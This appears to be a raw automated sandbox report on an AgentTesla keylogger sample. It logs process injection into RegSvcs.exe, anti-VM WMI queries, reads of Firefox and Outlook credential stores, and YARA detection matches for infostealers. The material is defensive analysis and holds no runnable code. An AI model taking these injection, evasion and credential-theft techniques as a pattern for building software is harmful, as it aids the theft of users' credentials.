Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_05FABCE8	1_2_05FABCE8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_05FADC18	1_2_05FADC18
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_05FA3F50	1_2_05FA3F50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_05FA56E0	1_2_05FA56E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_05FA0040	1_2_05FA0040
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_05FA8B87	1_2_05FA8B87
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_05FA2AF8	1_2_05FA2AF8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_05FA9AD0	1_2_05FA9AD0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_05FA5000	1_2_05FA5000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_05FA3248	1_2_05FA3248

Source: C:\Users\user\Desktop\7F7R8soxHM.exe	Code function: String function: 00E77F41 appears 35 times
Source: C:\Users\user\Desktop\7F7R8soxHM.exe	Code function: String function: 00E90D27 appears 70 times
Source: C:\Users\user\Desktop\7F7R8soxHM.exe	Code function: String function: 00E98B40 appears 42 times

Source: 7F7R8soxHM.exe, 00000000.00000003.1642654082.00000000042B3000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs 7F7R8soxHM.exe
Source: 7F7R8soxHM.exe, 00000000.00000003.1644430619.000000000445D000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs 7F7R8soxHM.exe
Source: 7F7R8soxHM.exe, 00000000.00000002.1658984984.0000000001720000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilename18ef6abe-0433-4b57-8077-a2a6b10a362d.exe4 vs 7F7R8soxHM.exe

Source: 7F7R8soxHM.exe

Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE

Source: 0.2.7F7R8soxHM.exe.1720000.1.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 0.2.7F7R8soxHM.exe.1720000.1.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
Source: 0.2.7F7R8soxHM.exe.1720000.1.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 0.2.7F7R8soxHM.exe.1720000.1.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
Source: 1.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 1.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
Source: 00000000.00000002.1658984984.0000000001720000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 00000000.00000002.1658984984.0000000001720000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload

Source: 0.2.7F7R8soxHM.exe.1720000.1.raw.unpack, KLhJmaON.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.7F7R8soxHM.exe.1720000.1.raw.unpack, KLhJmaON.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.7F7R8soxHM.exe.1720000.1.raw.unpack, 7hO8luD.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.7F7R8soxHM.exe.1720000.1.raw.unpack, 7hO8luD.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.7F7R8soxHM.exe.1720000.1.raw.unpack, 7hO8luD.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.7F7R8soxHM.exe.1720000.1.raw.unpack, 7hO8luD.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.7F7R8soxHM.exe.1720000.1.raw.unpack, 9HIFdl.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.7F7R8soxHM.exe.1720000.1.raw.unpack, 9HIFdl.cs	Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@3/4@1/1

Source: C:\Users\user\Desktop\7F7R8soxHM.exe

Code function: 0_2_00EDA2D5 GetLastError,FormatMessageW,

0_2_00EDA2D5

Source: C:\Users\user\Desktop\7F7R8soxHM.exe	Code function: 0_2_00EC8713 AdjustTokenPrivileges,CloseHandle,		0_2_00EC8713
Source: C:\Users\user\Desktop\7F7R8soxHM.exe	Code function: 0_2_00EC8CC3 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,		0_2_00EC8CC3

Source: C:\Users\user\Desktop\7F7R8soxHM.exe

Code function: 0_2_00EDB59E SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode,

0_2_00EDB59E

Source: C:\Users\user\Desktop\7F7R8soxHM.exe

Code function: 0_2_00EEF121 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,

0_2_00EEF121

Source: C:\Users\user\Desktop\7F7R8soxHM.exe

Code function: 0_2_00EE86D0 CoInitialize,CoUninitialize,CoCreateInstance,IIDFromString,VariantInit,VariantClear,

0_2_00EE86D0

Source: C:\Users\user\Desktop\7F7R8soxHM.exe

Code function: 0_2_00E74FE9 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,

0_2_00E74FE9

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Mutant created: NULL

Source: C:\Users\user\Desktop\7F7R8soxHM.exe

File created: C:\Users\user\AppData\Local\Temp\aut5DEB.tmp

Jump to behavior

Source: 7F7R8soxHM.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

File read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini

Jump to behavior

Source: C:\Users\user\Desktop\7F7R8soxHM.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: 7F7R8soxHM.exe	ReversingLabs: Detection: 65%
Source: 7F7R8soxHM.exe	Virustotal: Detection: 63%

Source: unknown	Process created: C:\Users\user\Desktop\7F7R8soxHM.exe "C:\Users\user\Desktop\7F7R8soxHM.exe"
Source: C:\Users\user\Desktop\7F7R8soxHM.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\Desktop\7F7R8soxHM.exe"
Source: C:\Users\user\Desktop\7F7R8soxHM.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\Desktop\7F7R8soxHM.exe"	Jump to behavior

Source: C:\Users\user\Desktop\7F7R8soxHM.exe	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Users\user\Desktop\7F7R8soxHM.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\7F7R8soxHM.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\7F7R8soxHM.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\Desktop\7F7R8soxHM.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\7F7R8soxHM.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\7F7R8soxHM.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\7F7R8soxHM.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\7F7R8soxHM.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\7F7R8soxHM.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\7F7R8soxHM.exe	Section loaded: wldp.dll	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\11.0\Outlook\Profiles

Jump to behavior

Source: 7F7R8soxHM.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: 7F7R8soxHM.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: 7F7R8soxHM.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: 7F7R8soxHM.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: 7F7R8soxHM.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: 7F7R8soxHM.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT

Source: 7F7R8soxHM.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: wntdll.pdbUGP source: 7F7R8soxHM.exe, 00000000.00000003.1643867500.0000000004190000.00000004.00001000.00020000.00000000.sdmp, 7F7R8soxHM.exe, 00000000.00000003.1643414153.0000000004330000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: 7F7R8soxHM.exe, 00000000.00000003.1643867500.0000000004190000.00000004.00001000.00020000.00000000.sdmp, 7F7R8soxHM.exe, 00000000.00000003.1643414153.0000000004330000.00000004.00001000.00020000.00000000.sdmp

Source: 7F7R8soxHM.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: 7F7R8soxHM.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: 7F7R8soxHM.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: 7F7R8soxHM.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: 7F7R8soxHM.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Source: C:\Users\user\Desktop\7F7R8soxHM.exe

Code function: 0_2_00EEC304 LoadLibraryA,GetProcAddress,

0_2_00EEC304

Source: C:\Users\user\Desktop\7F7R8soxHM.exe	Code function: 0_2_00ED8719 push FFFFFF8Bh; iretd	0_2_00ED871B
Source: C:\Users\user\Desktop\7F7R8soxHM.exe	Code function: 0_2_00E9E94F push edi; ret	0_2_00E9E951
Source: C:\Users\user\Desktop\7F7R8soxHM.exe	Code function: 0_2_00E9EA68 push esi; ret	0_2_00E9EA6A
Source: C:\Users\user\Desktop\7F7R8soxHM.exe	Code function: 0_2_00E98B85 push ecx; ret	0_2_00E98B98
Source: C:\Users\user\Desktop\7F7R8soxHM.exe	Code function: 0_2_00E9EC43 push esi; ret	0_2_00E9EC45
Source: C:\Users\user\Desktop\7F7R8soxHM.exe	Code function: 0_2_00E9ED2C push edi; ret	0_2_00E9ED2E

Source: C:\Users\user\Desktop\7F7R8soxHM.exe	Code function: 0_2_00E74A35 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,		0_2_00E74A35
Source: C:\Users\user\Desktop\7F7R8soxHM.exe	Code function: 0_2_00EF55FD IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,		0_2_00EF55FD

Source: C:\Users\user\Desktop\7F7R8soxHM.exe

Code function: 0_2_00E933C7 EncodePointer,__initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

0_2_00E933C7

Source: C:\Users\user\Desktop\7F7R8soxHM.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\7F7R8soxHM.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration

Source: C:\Users\user\Desktop\7F7R8soxHM.exe

Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes

graph_0-98301

Source: C:\Users\user\Desktop\7F7R8soxHM.exe

API coverage: 4.7 %

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor

Source: C:\Users\user\Desktop\7F7R8soxHM.exe	Code function: 0_2_00ED4696 GetFileAttributesW,FindFirstFileW,FindClose,	0_2_00ED4696
Source: C:\Users\user\Desktop\7F7R8soxHM.exe	Code function: 0_2_00EDC9C7 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,	0_2_00EDC9C7
Source: C:\Users\user\Desktop\7F7R8soxHM.exe	Code function: 0_2_00EDC93C FindFirstFileW,FindClose,	0_2_00EDC93C
Source: C:\Users\user\Desktop\7F7R8soxHM.exe	Code function: 0_2_00EDF200 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	0_2_00EDF200
Source: C:\Users\user\Desktop\7F7R8soxHM.exe	Code function: 0_2_00EDF35D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	0_2_00EDF35D
Source: C:\Users\user\Desktop\7F7R8soxHM.exe	Code function: 0_2_00EDF65E FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,	0_2_00EDF65E
Source: C:\Users\user\Desktop\7F7R8soxHM.exe	Code function: 0_2_00ED3A2B FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	0_2_00ED3A2B
Source: C:\Users\user\Desktop\7F7R8soxHM.exe	Code function: 0_2_00ED3D4E FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	0_2_00ED3D4E
Source: C:\Users\user\Desktop\7F7R8soxHM.exe	Code function: 0_2_00EDBF27 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,	0_2_00EDBF27

Source: C:\Users\user\Desktop\7F7R8soxHM.exe

Code function: 0_2_00E74AFE GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,

0_2_00E74AFE

Source: 7F7R8soxHM.exe, 00000000.00000002.1658984984.0000000001720000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.2882256622.0000000000402000.00000040.80000000.00040000.00000000.sdmp	Binary or memory string: hgfsZrw6
Source: RegSvcs.exe, 00000001.00000002.2885335376.0000000005E90000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dlldeExKK

Source: C:\Users\user\Desktop\7F7R8soxHM.exe	API call chain: ExitProcess graph end node			graph_0-97346
Source: C:\Users\user\Desktop\7F7R8soxHM.exe	API call chain: ExitProcess graph end node			graph_0-97420

Source: C:\Users\user\Desktop\7F7R8soxHM.exe

Code function: 0_2_00EE41FD BlockInput,

0_2_00EE41FD

Source: C:\Users\user\Desktop\7F7R8soxHM.exe

Code function: 0_2_00E73B4C GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,

0_2_00E73B4C

Source: C:\Users\user\Desktop\7F7R8soxHM.exe

Code function: 0_2_00EA5CCC EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,

0_2_00EA5CCC

Source: C:\Users\user\Desktop\7F7R8soxHM.exe

Code function: 0_2_00EEC304 LoadLibraryA,GetProcAddress,

0_2_00EEC304

Source: C:\Users\user\Desktop\7F7R8soxHM.exe	Code function: 0_2_01713540 mov eax, dword ptr fs:[00000030h]	0_2_01713540
Source: C:\Users\user\Desktop\7F7R8soxHM.exe	Code function: 0_2_017135A0 mov eax, dword ptr fs:[00000030h]	0_2_017135A0
Source: C:\Users\user\Desktop\7F7R8soxHM.exe	Code function: 0_2_01711ED0 mov eax, dword ptr fs:[00000030h]	0_2_01711ED0

Source: C:\Users\user\Desktop\7F7R8soxHM.exe

Code function: 0_2_00EC81F7 GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,

0_2_00EC81F7

Source: C:\Users\user\Desktop\7F7R8soxHM.exe	Code function: 0_2_00E9A395 SetUnhandledExceptionFilter,UnhandledExceptionFilter,		0_2_00E9A395
Source: C:\Users\user\Desktop\7F7R8soxHM.exe	Code function: 0_2_00E9A364 SetUnhandledExceptionFilter,		0_2_00E9A364

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Maps a DLL or memory area into another process

Source: C:\Users\user\Desktop\7F7R8soxHM.exe

Section loaded: NULL target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe protection: execute and read and write

Jump to behavior

Writes to foreign memory regions

Source: C:\Users\user\Desktop\7F7R8soxHM.exe

Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 8BD008

Jump to behavior

Source: C:\Users\user\Desktop\7F7R8soxHM.exe

Code function: 0_2_00EC8C93 LogonUserW,

0_2_00EC8C93

Source: C:\Users\user\Desktop\7F7R8soxHM.exe

Code function: 0_2_00E73B4C GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,

0_2_00E73B4C

Source: C:\Users\user\Desktop\7F7R8soxHM.exe

